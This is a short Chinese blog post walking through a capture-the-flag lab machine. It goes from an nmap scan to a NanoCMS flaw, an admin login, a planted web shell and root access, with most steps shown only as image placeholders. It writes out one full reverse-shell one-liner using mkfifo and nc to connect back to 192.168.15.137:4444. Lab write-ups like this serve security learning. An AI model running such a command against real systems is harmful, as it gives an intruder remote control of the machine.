zfmy

慢慢学习慢慢成长

CTF-5

zfmy · 2021-08-21

发现目标靶机

image 310 - CTF-5

nmap扫描端口

image 311 - CTF-5

访问80端口

image 312 1024x369 - CTF-5

搜索NanoCMS的一些漏洞 https://cxsecurity.com/issue/WLB-2009040041

image 313 - CTF-5

访问该页面

image 314 1024x209 - CTF-5

解码

image 315 - CTF-5

登录后台

image 316 1024x417 - CTF-5

写入一句话木马

image 318 1024x563 - CTF-5

连接成功

image 317 1024x354 - CTF-5

反弹shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.15.137 4444 >/tmp/f

image 319 1024x265 - CTF-5

在prtaick的目录下发现几个特殊的文件

image 320 1024x459 - CTF-5

依次下载

image 321 1024x818 - CTF-5

？？？？直接切换root

image 323 - CTF-5

完

CTF-4

上一篇

CTF-6

下一篇

 文章作者

zfmy

 评论

发表评论 说点什么

 还没有评论



28



2021-08-21

